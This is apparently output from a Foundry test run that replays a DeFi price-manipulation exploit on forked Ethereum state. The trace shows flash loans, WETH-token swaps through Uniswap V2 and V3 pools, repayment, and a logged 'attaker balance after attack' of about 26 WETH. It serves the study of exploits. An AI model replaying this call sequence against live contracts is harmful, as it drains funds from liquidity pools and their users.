    │   │   │   │   ├─ [60374] 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D::swapTokensForExactTokens(64067926675248097 [6.406e16], 104115612387614229901 [1.041e20], [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 0x8390a1DA07E376ef7aDd4Be859BA74Fb83aA02D5], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1699584783 [1.699e9])
    │   │   │   │   │   ├─ [504] 0x69c66BeAfB06674Db41b22CFC50c34A93b8d82a2::getReserves() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 173433466859211592 [1.734e17], 95828993688770310197 [9.582e19], 1699584683 [1.699e9]
    │   │   │   │   │   ├─ [3425] WETH::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x69c66BeAfB06674Db41b22CFC50c34A93b8d82a2, 56306941362252641162 [5.63e19])
    │   │   │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x69c66BeAfB06674Db41b22CFC50c34A93b8d82a2, value: 56306941362252641162 [5.63e19])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x564849b19bcf06fcce9f147d09c1c709d0718e975cdd1cf0a30b74a71c297f8c: 0x00000000000000000000000000000000000000000000000531e4fa09424df035 → 0x0000000000000000000000000000000000000000000000083f4f6ae0d01f63bf
    │   │   │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x000000000000000000000000000000000000000000000005a4e4f5d6a001858d → 0x000000000000000000000000000000000000000000000002977a84ff12301203
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [48618] 0x69c66BeAfB06674Db41b22CFC50c34A93b8d82a2::swap(64067926675248097 [6.406e16], 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   │   │   │   ├─ [35360] 0x8390a1DA07E376ef7aDd4Be859BA74Fb83aA02D5::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 64067926675248097 [6.406e16])
    │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x69c66BeAfB06674Db41b22CFC50c34A93b8d82a2, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 64067926675248097 [6.406e16])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0x4136c5a29233bd6e1eb4ac9d2704c839930ce9ceeb6c22ea86798eecfffb19a6: 0x000000000000000000000000000000000000000000000000026828d1b84ecb48 → 0x00000000000000000000000000000000000000000000000001848b611d557767
    │   │   │   │   │   │   │   │   @ 14: 22817 → 22818
    │   │   │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x00000000000000000000000000000000000000000000000000e39d709af953e1
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   ├─ [617] 0x8390a1DA07E376ef7aDd4Be859BA74Fb83aA02D5::balanceOf(0x69c66BeAfB06674Db41b22CFC50c34A93b8d82a2) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 109365540183963495 [1.093e17]
    │   │   │   │   │   │   ├─ [534] WETH::balanceOf(0x69c66BeAfB06674Db41b22CFC50c34A93b8d82a2) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 152135935051022951359 [1.521e20]
    │   │   │   │   │   │   ├─ emit Sync(reserve0: 109365540183963495 [1.093e17], reserve1: 152135935051022951359 [1.521e20])
    │   │   │   │   │   │   ├─ emit Swap(sender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, amount0In: 0, amount1In: 56306941362252641162 [5.63e19], amount0Out: 64067926675248097 [6.406e16], amount1Out: 0, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 8: 0x654d9aab00000000000531e4fa09424df035000000000000026828d1b84ecb48 → 0x654d9aab0000000000083f4f6ae0d01f63bf00000000000001848b611d557767
    │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   └─ ← [Return] [56306941362252641162 [5.63e19], 64067926675248097 [6.406e16]]
    │   │   │   │   ├─ [617] 0x8390a1DA07E376ef7aDd4Be859BA74Fb83aA02D5::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 64067926675248097 [6.406e16]
    │   │   │   │   ├─ [9301] 0x8390a1DA07E376ef7aDd4Be859BA74Fb83aA02D5::transfer(0x66bA59cBD09E75B209D1D7E8Cf97f4Ab34DA413B, 64067926675248097 [6.406e16])
    │   │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x66bA59cBD09E75B209D1D7E8Cf97f4Ab34DA413B, value: 64067926675248097 [6.406e16])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xa474726fc09f41f3c20610c61c95ca18ae9853cba1981b1b83e50cc3a6011f21: 0 → 0x00000000000000000000000000000000000000000000000000e39d709af953e1
    │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000000000000e39d709af953e1 → 0
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [54707] 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D::swapExactTokensForTokensSupportingFeeOnTransferTokens(30000000000000000000 [3e19], 0, [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 0x8390a1DA07E376ef7aDd4Be859BA74Fb83aA02D5], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1699584783 [1.699e9])
    │   │   │   │   │   ├─ [3425] WETH::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x69c66BeAfB06674Db41b22CFC50c34A93b8d82a2, 30000000000000000000 [3e19])
    │   │   │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x69c66BeAfB06674Db41b22CFC50c34A93b8d82a2, value: 30000000000000000000 [3e19])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x564849b19bcf06fcce9f147d09c1c709d0718e975cdd1cf0a30b74a71c297f8c: 0x0000000000000000000000000000000000000000000000083f4f6ae0d01f63bf → 0x000000000000000000000000000000000000000000000009dfa4d3ee6dd763bf
    │   │   │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x000000000000000000000000000000000000000000000002977a84ff12301203 → 0x000000000000000000000000000000000000000000000000f7251bf174781203
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [617] 0x8390a1DA07E376ef7aDd4Be859BA74Fb83aA02D5::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   ├─ [504] 0x69c66BeAfB06674Db41b22CFC50c34A93b8d82a2::getReserves() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 109365540183963495 [1.093e17], 152135935051022951359 [1.521e20], 1699584683 [1.699e9]
    │   │   │   │   │   ├─ [534] WETH::balanceOf(0x69c66BeAfB06674Db41b22CFC50c34A93b8d82a2) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 182135935051022951359 [1.821e20]
    │   │   │   │   │   ├─ [41818] 0x69c66BeAfB06674Db41b22CFC50c34A93b8d82a2::swap(17968669863381094 [1.796e16], 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   │   │   │   ├─ [28560] 0x8390a1DA07E376ef7aDd4Be859BA74Fb83aA02D5::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 17968669863381094 [1.796e16])
    │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x69c66BeAfB06674Db41b22CFC50c34A93b8d82a2, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 17968669863381094 [1.796e16])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 14: 22818 → 22819
    │   │   │   │   │   │   │   │   @ 0x4136c5a29233bd6e1eb4ac9d2704c839930ce9ceeb6c22ea86798eecfffb19a6: 0x00000000000000000000000000000000000000000000000001848b611d557767 → 0x0000000000000000000000000000000000000000000000000144b4f8250a6f01
    │   │   │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x000000000000000000000000000000000000000000000000003fd668f84b0866
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   ├─ [617] 0x8390a1DA07E376ef7aDd4Be859BA74Fb83aA02D5::balanceOf(0x69c66BeAfB06674Db41b22CFC50c34A93b8d82a2) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 91396870320582401 [9.139e16]
    │   │   │   │   │   │   ├─ [534] WETH::balanceOf(0x69c66BeAfB06674Db41b22CFC50c34A93b8d82a2) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 182135935051022951359 [1.821e20]
    │   │   │   │   │   │   ├─ emit Sync(reserve0: 91396870320582401 [9.139e16], reserve1: 182135935051022951359 [1.821e20])
    │   │   │   │   │   │   ├─ emit Swap(sender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, amount0In: 0, amount1In: 30000000000000000000 [3e19], amount0Out: 17968669863381094 [1.796e16], amount1Out: 0, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 8: 0x654d9aab0000000000083f4f6ae0d01f63bf00000000000001848b611d557767 → 0x654d9aab000000000009dfa4d3ee6dd763bf0000000000000144b4f8250a6f01
    │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   ├─ [617] 0x8390a1DA07E376ef7aDd4Be859BA74Fb83aA02D5::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 17968669863381094 [1.796e16]
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xb8b3dd7b343e4967bcca95a8f7fb77b7990e98e0367fb174bf8dfeca3548cc2e: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   │   │   @ 0x4eee3e6129f13be77ddda62523dc4512bbc861aa373bdaadd88dde9639393ab9: 0x00000000000000000000000000000000000000000000000000eb68f9e38e68f5 → 0x00000000000000000000000000000000000000000000000000f52322a51b4a00
    │   │   │   │   │   @ 12: 0 → 1
    │   │   │   │   │   @ 0xa474726fc09f41f3c20610c61c95ca18ae9853cba1981b1b83e50cc3a6011f21: 0 → 0x00000000000000000000000000000000000000000000000000e39d709af953e1
    │   │   │   │   │   @ 0x26de9a43e7704b60d31f71cc330b4d43a0db9dad71c363e2fbd9119e9db294b7: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [617] 0x8390a1DA07E376ef7aDd4Be859BA74Fb83aA02D5::balanceOf(0x66bA59cBD09E75B209D1D7E8Cf97f4Ab34DA413B) [staticcall]
    │   │   │   │   └─ ← [Return] 64067926675248097 [6.406e16]
    │   │   │   ├─ [534] WETH::balanceOf(0x66bA59cBD09E75B209D1D7E8Cf97f4Ab34DA413B) [staticcall]
    │   │   │   │   └─ ← [Return] 162684446548638971088 [1.626e20]
    │   │   │   ├─ emit Flash(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param2: 63433590767572373 [6.343e16], param3: 0, param4: 634335907675724 [6.343e14], param5: 0)
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 1: 0x0000000000000000000000000000000006085eeb3701f1af9058ac9990f887b8 → 0x00000000000000000000000000000000060edc1ee0da6a74432af5d7f9447a1e
    │   │   │   └─ ← [Stop]
    │   │   ├─ [617] 0x8390a1DA07E376ef7aDd4Be859BA74Fb83aA02D5::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 17968669863381094 [1.796e16]
    │   │   ├─ [2633] 0x8390a1DA07E376ef7aDd4Be859BA74Fb83aA02D5::approve(0xE592427A0AEce92De3Edee1F18E0157C05861564, 17968669863381094 [1.796e16])
    │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0xE592427A0AEce92De3Edee1F18E0157C05861564, value: 17968669863381094 [1.796e16])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xb8b3dd7b343e4967bcca95a8f7fb77b7990e98e0367fb174bf8dfeca3548cc2e: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0x000000000000000000000000000000000000000000000000003fd668f84b0866
    │   │   │   └─ ← [Return] true
    │   │   ├─ [617] 0x8390a1DA07E376ef7aDd4Be859BA74Fb83aA02D5::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 17968669863381094 [1.796e16]
    │   │   ├─ [275411] 0xE592427A0AEce92De3Edee1F18E0157C05861564::exactInputSingle(ExactInputSingleParams({ tokenIn: 0x8390a1DA07E376ef7aDd4Be859BA74Fb83aA02D5, tokenOut: 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, fee: 10000 [1e4], recipient: 0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496, deadline: 1699584783 [1.699e9], amountIn: 17968669863381094 [1.796e16], amountOutMinimum: 30000000000000000000 [3e19], sqrtPriceLimitX96: 0 }))
    │   │   │   ├─ [270479] 0x66bA59cBD09E75B209D1D7E8Cf97f4Ab34DA413B::swap(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], true, 17968669863381094 [1.796e16], 4295128740 [4.295e9], 0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000400000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496000000000000000000000000000000000000000000000000000000000000002b8390a1da07e376ef7add4be859ba74fb83aa02d5002710c02aaa39b223fe8d0a0e5c4f27ead9083c756cc2000000000000000000000000000000000000000000)
    │   │   │   │   ├─ [6062] WETH::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 38583479183573537824 [3.858e19])
    │   │   │   │   │   ├─ emit Transfer(from: 0x66bA59cBD09E75B209D1D7E8Cf97f4Ab34DA413B, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 38583479183573537824 [3.858e19])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x57a20d3a632726f53f0118390202e9868a1daca6d35e2a60a9b0751d8e293ad0: 0x000000000000000000000000000000000000000000000008d1b3423264a634d0 → 0x000000000000000000000000000000000000000000000006ba3f344dad11e0b0
    │   │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x000000000000000000000000000000000000000000000000f7251bf174781203 → 0x0000000000000000000000000000000000000000000000030e9929d62c0c6623
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [617] 0x8390a1DA07E376ef7aDd4Be859BA74Fb83aA02D5::balanceOf(0x66bA59cBD09E75B209D1D7E8Cf97f4Ab34DA413B) [staticcall]
    │   │   │   │   │   └─ ← [Return] 64067926675248097 [6.406e16]
    │   │   │   │   ├─ [14220] 0xE592427A0AEce92De3Edee1F18E0157C05861564::uniswapV3SwapCallback(17968669863381094 [1.796e16], -38583479183573537824 [-3.858e19], 0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000400000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496000000000000000000000000000000000000000000000000000000000000002b8390a1da07e376ef7add4be859ba74fb83aa02d5002710c02aaa39b223fe8d0a0e5c4f27ead9083c756cc2000000000000000000000000000000000000000000)
    │   │   │   │   │   ├─ [10164] 0x8390a1DA07E376ef7aDd4Be859BA74Fb83aA02D5::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x66bA59cBD09E75B209D1D7E8Cf97f4Ab34DA413B, 17968669863381094 [1.796e16])
    │   │   │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x66bA59cBD09E75B209D1D7E8Cf97f4Ab34DA413B, value: 17968669863381094 [1.796e16])
    │   │   │   │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0xE592427A0AEce92De3Edee1F18E0157C05861564, value: 0)
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0xa474726fc09f41f3c20610c61c95ca18ae9853cba1981b1b83e50cc3a6011f21: 0x00000000000000000000000000000000000000000000000000e39d709af953e1 → 0x000000000000000000000000000000000000000000000000012373d993445c47
    │   │   │   │   │   │   │   @ 0xb8b3dd7b343e4967bcca95a8f7fb77b7990e98e0367fb174bf8dfeca3548cc2e: 0x000000000000000000000000000000000000000000000000003fd668f84b0866 → 0
    │   │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000000000003fd668f84b0866 → 0
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [617] 0x8390a1DA07E376ef7aDd4Be859BA74Fb83aA02D5::balanceOf(0x66bA59cBD09E75B209D1D7E8Cf97f4Ab34DA413B) [staticcall]
    │   │   │   │   │   └─ ← [Return] 82036596538629191 [8.203e16]
    │   │   │   │   ├─ emit Swap(param0: 0xE592427A0AEce92De3Edee1F18E0157C05861564, param1: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param2: 17968669863381094 [1.796e16], param3: -38583479183573537824 [-3.858e19], param4: 3485668531262138065945584637050 [3.485e30], param5: 7304049607458931662 [7.304e18], param6: 75685 [7.568e4])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x949e5e84b521fb80b1e09a166c2412e714f25916a855b11979dad73ac6a60c3e: 0x01654d6f07000000000000000000882ffb7869177856ee4a83000007bcff2a48 → 0x0100002ba40000000000000000000072d9b2b149289443ac7c000000337faf94
    │   │   │   │   │   @ 0xcee5743d259ee64ed7a44041350e3ae171bf383da97f3c069b21e5635f65aa0b: 0x0000000000000000000000000000000bce4bd9ebf05b57dc981b8faef4f56998 → 0x000000000000000000000000000000002034d4f94a43972a39924acff0a3a9e2
    │   │   │   │   │   @ 8: 0x0100000000000000000088a2b29d913fb9da175c79000007f07091d8654d9a9f → 0x0100000000000000000088a2d52b1a60a0eb31f6ff000007f07ed9dc654d9aab
    │   │   │   │   │   @ 0x4ba6a2361c8f5929627f936012ffb55b1af7da6452ebf5e5e88d0bcfc8dca6cb: 0x01654d6c670000000000000000008826e000de383cded61377000007b9e13f9c → 0x0100002e44000000000000000000007bf52a3c28640c5be388000000369d9a40
    │   │   │   │   │   @ 0x949e5e84b521fb80b1e09a166c2412e714f25916a855b11979dad73ac6a60c3c: 0x000000000000000000000000000000000602fed63d485a2d5986198666ad64d9 → 0x00000000000000000000000000000000000d4562b5def7c88f9224624c2d496b
    │   │   │   │   │   @ 0x949e5e84b521fb80b1e09a166c2412e714f25916a855b11979dad73ac6a60c3d: 0x0000000000000000000000000000000bb7bc6acbd54a485c2e05adc6bd8fb134 → 0x0000000000000000000000000000000036c444196554a6aaa3a82cb828096246
    │   │   │   │   │   @ 0x664fb1b3c2c91e7587b424b5463794f37d15b2c1726475315e3493d7da5a28b6: 0x01654d7fb70000000000000000008856b183bae690278c1b05000007d0798e38 → 0x0100001af4000000000000000000004c23a75f7a10c3a5dbfa00000020054ba4
    │   │   │   │   │   @ 0x654ac48226a72e634d335a8c4164c3fe4d2dde260a819dbb9b459f434ecf01ff: 0x01654d742300000000000000000088391c49720f6303902821000007c2e7e0ac → 0x01000026880000000000000000000069b8e1a8513de7a1cede0000002d96f930
    │   │   │   │   │   @ 0x1088ba1e301a6f060d888532c36b16f053902eea509aed3676978c3442ef224f: 0x00000000000000000000000000000000060438fd5b4fcd8db878dc2fa3046a75 → 0x00000000000000000000000000000000000b768f7e68116c67ef2825e9b38339
    │   │   │   │   │   @ 0x97b47d61d2cf8f609644f7883774b4ed0035d5ae8f1017f019f5e72aac2e0f03: 0x0000000000000000000000000000000b611cb01712fcfe3c9446627279f492b1 → 0x000000000000000000000000000000008d63fece27a1f0ca3d67780c6ba480c9
    │   │   │   │   │   @ 0xcee5743d259ee64ed7a44041350e3ae171bf383da97f3c069b21e5635f65aa0a: 0x000000000000000000000000000000000605882b74a20950afcc0edddbed5caf → 0x000000000000000000000000000000000009df3ea9e87266000cff1809132802
    │   │   │   │   │   @ 0x654ac48226a72e634d335a8c4164c3fe4d2dde260a819dbb9b459f434ecf01fd: 0x000000000000000000000000000000000602eac16e073a7b51cd11cc4c204b46 → 0x00000000000000000000000000000000000ce96834de5a53d42b5ab05665fd51
    │   │   │   │   │   @ 0x677d49e589a87a67b82a157943908c3aa8a4c75cf68c2d09cec5d43e64c96fbf: 0x000000000000000000000000000000000605e00e15475e8b0ba0169c11af9022 → 0x00000000000000000000000000000000000940a6f3e3dfb74ca4aea0628f2f92
    │   │   │   │   │   @ 0x664fb1b3c2c91e7587b424b5463794f37d15b2c1726475315e3493d7da5a28b5: 0x0000000000000000000000000000000bc828be20a5c688b850d6f8d1c3f1f6e1 → 0x000000000000000000000000000000002657f0c494d8664e80d6e1ad21a71c99
    │   │   │   │   │   @ 0x1088ba1e301a6f060d888532c36b16f053902eea509aed3676978c3442ef2251: 0x01654d7a5f0000000000000000008848f2f9ff55b84f1d130d000007ca341ae8 → 0x010000204c0000000000000000000059e2311b0ae89c14e3f2000000264abef4
    │   │   │   │   │   @ 1: 0x00000000000000000000000000000000060edc1ee0da6a74432af5d7f9447a1e → 0x0000000000000000000000000000000006108053a3fce93052caa3a3b9777cb0
    │   │   │   │   │   @ 0x97b47d61d2cf8f609644f7883774b4ed0035d5ae8f1017f019f5e72aac2e0f04: 0x01654d39af00000000000000000087af771a656b75dc2672f00000077ef88ad8 → 0x01000060fc00000000000000000000f35e10b4f52b0f0b840f00000071864f04
    │   │   │   │   │   @ 0x6a6e7a82b7789c5919e4c857c81a239a51bb0136c874794f7781a10d7dc6506f: 0x00000000000000000000000000000000060636bab7ff5adfe7a2c4478c63c161 → 0x000000000000000000000000000000000008c726a006331e56594651e67392c1
    │   │   │   │   │   @ 0x677d49e589a87a67b82a157943908c3aa8a4c75cf68c2d09cec5d43e64c96fc0: 0x0000000000000000000000000000000bd3d8638dabd96badedaa5361402f1c39 → 0x000000000000000000000000000000001aa84b578ec58358e403871da569f741
    │   │   │   │   │   @ 0xcee5743d259ee64ed7a44041350e3ae171bf383da97f3c069b21e5635f65aa0c: 0x01654d8317000000000000000000885f760751a13c91ec7e19000007d471b9c8 → 0x010000179400000000000000000000435f23c8bf64594578e60000001c0d2014
    │   │   │   │   │   @ 0x664fb1b3c2c91e7587b424b5463794f37d15b2c1726475315e3493d7da5a28b4: 0x000000000000000000000000000000000604f773e6104510c8f6bea989e3eba2 → 0x00000000000000000000000000000000000a93d96c0c2708bdb755f481c730b6
    │   │   │   │   │   @ 0x6a6e7a82b7789c5919e4c857c81a239a51bb0136c874794f7781a10d7dc65071: 0x01654d8b57000000000000000000887597f0eb08b0e8ec6f71000007de3715d0 → 0x0100000f54000000000000000000002d3d3a2f57f00245878e0000001247c40c
    │   │   │   │   │   @ 0x6a6e7a82b7789c5919e4c857c81a239a51bb0136c874794f7781a10d7dc65070: 0x0000000000000000000000000000000bd83c8ca5730c9a72f12c0fa1aadca2a8 → 0x000000000000000000000000000000001644223fc7925493e081cadd3abc70d2
    │   │   │   │   │   @ 0x654ac48226a72e634d335a8c4164c3fe4d2dde260a819dbb9b459f434ecf01fe: 0x0000000000000000000000000000000bb474d42e4b574360f3cb3c5794cbc88f → 0x000000000000000000000000000000003a0bdab6ef47aba5dde29e2750cd4aeb
    │   │   │   │   │   @ 0x1088ba1e301a6f060d888532c36b16f053902eea509aed3676978c3442ef2250: 0x0000000000000000000000000000000bc098dd8757373f0ba17f33ebd1c78c27 → 0x000000000000000000000000000000002de7d15de367affb302ea69313d18753
    │   │   │   │   │   @ 4: 0x00000000000000000000000000000000000000000000000058e83faebf327f3b → 0x000000000000000000000000000000000000000000000000655d326b626bc3ce
    │   │   │   │   │   @ 0: 0x0001000001000100000130ab000000000000003161e7ca630e158737f36251ef → 0x0001000001000100000127a5000000000000002bfecd6e4bf03968bb745e947a
    │   │   │   │   │   @ 0x4ba6a2361c8f5929627f936012ffb55b1af7da6452ebf5e5e88d0bcfc8dca6c9: 0x000000000000000000000000000000000600efb6dbab270eeaf2616c6fcae361 → 0x00000000000000000000000000000000000f096dc1e6427ae848def22b715772
    │   │   │   │   │   @ 0x4ba6a2361c8f5929627f936012ffb55b1af7da6452ebf5e5e88d0bcfc8dca6ca: 0x0000000000000000000000000000000ba30a082fc3e27b4648149caef211a152 → 0x000000000000000000000000000000004b76a6b576bc73c089993dcff3877228
    │   │   │   │   │   @ 0x97b47d61d2cf8f609644f7883774b4ed0035d5ae8f1017f019f5e72aac2e0f02: 0x0000000000000000000000000000000005f9025d8b9853e9d827e4807d4e03ab → 0x00000000000000000000000000000000001767f6ae77e81f0915f77aa0008698
    │   │   │   │   │   @ 0x677d49e589a87a67b82a157943908c3aa8a4c75cf68c2d09cec5d43e64c96fc1: 0x01654d855700000000000000000088654fc5e484ebb3b0cc35000007d719a664 → 0x0100001554000000000000000000003d856535dbb537812aca00000019653378
    │   │   │   │   └─ ← [Return] 17968669863381094 [1.796e16], -38583479183573537824 [-3.858e19]
    │   │   │   └─ ← [Return] 38583479183573537824 [3.858e19]
    │   │   ├─ [3262] WETH::transfer(0x109830a1AAaD605BbF02a9dFA7B0B92EC2FB7dAa, 30003000000000000000 [3e19])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x109830a1AAaD605BbF02a9dFA7B0B92EC2FB7dAa, value: 30003000000000000000 [3e19])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x0000000000000000000000000000000000000000000000030e9929d62c0c6623 → 0x0000000000000000000000000000000000000000000000016e39184ca000e623
    │   │   │   │   @ 0x3355aa162647aa87d59169dcdc67640130e9607c9491efc2a497dc7a2abf1102: 0x0000000000000000000000000000000000000000000000ce028ebdf60d658964 → 0x0000000000000000000000000000000000000000000000cfa2eecf7f99710964
    │   │   │   └─ ← [Return] true
    │   │   ├─  storage changes:
    │   │   │   @ 0xb8b3dd7b343e4967bcca95a8f7fb77b7990e98e0367fb174bf8dfeca3548cc2e: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0x000000000000000000000000000000000000000000000000003fd668f84b0866
    │   │   │   @ 0: 0x0000000001000100000130ab000000000000003161e7ca630e158737f36251ef → 0x0001000001000100000127a5000000000000002bfecd6e4bf03968bb745e947a
    │   │   └─ ← [Stop]
    │   ├─ [534] 0x7f39C581F595B53c5cb19bD0b3f8dA6c935E2Ca0::balanceOf(0x109830a1AAaD605BbF02a9dFA7B0B92EC2FB7dAa) [staticcall]
    │   │   └─ ← [Return] 7463189077965464780474 [7.463e21]
    │   ├─ [534] WETH::balanceOf(0x109830a1AAaD605BbF02a9dFA7B0B92EC2FB7dAa) [staticcall]
    │   │   └─ ← [Return] 3830216572683420764516 [3.83e21]
    │   ├─ emit Flash(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param2: 0, param3: 30000000000000000000 [3e19], param4: 0, param5: 3000000000000000 [3e15])
    │   ├─  storage changes:
    │   │   @ 2: 0x00000000000000000000000000000000000454cca208d112a6429b9bb5ec6d1a → 0x00000000000000000000000000000000000454cd0a4c4a43d72ef370672bc8dc
    │   └─ ← [Stop]
    ├─ [534] WETH::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 26389150208935126563 [2.638e19]
    ├─ [444] WETH::decimals() [staticcall]
    │   └─ ← [Return] 18
    ├─ emit log_named_decimal_uint(key: "attaker balance after attack:", val: 26389150208935126563 [2.638e19], decimals: 18)
    ├─  storage changes:
    │   @ 0: 0x00000000960096002b00054e000000000000000111fecbb56041299d0a4b9312 → 0x00010000960096002b00054e000000000000000111fecbb56041299d0a4b9312
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 23.52s (21.40s CPU time)

Ran 2 test suites in 23.77s (24.99s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
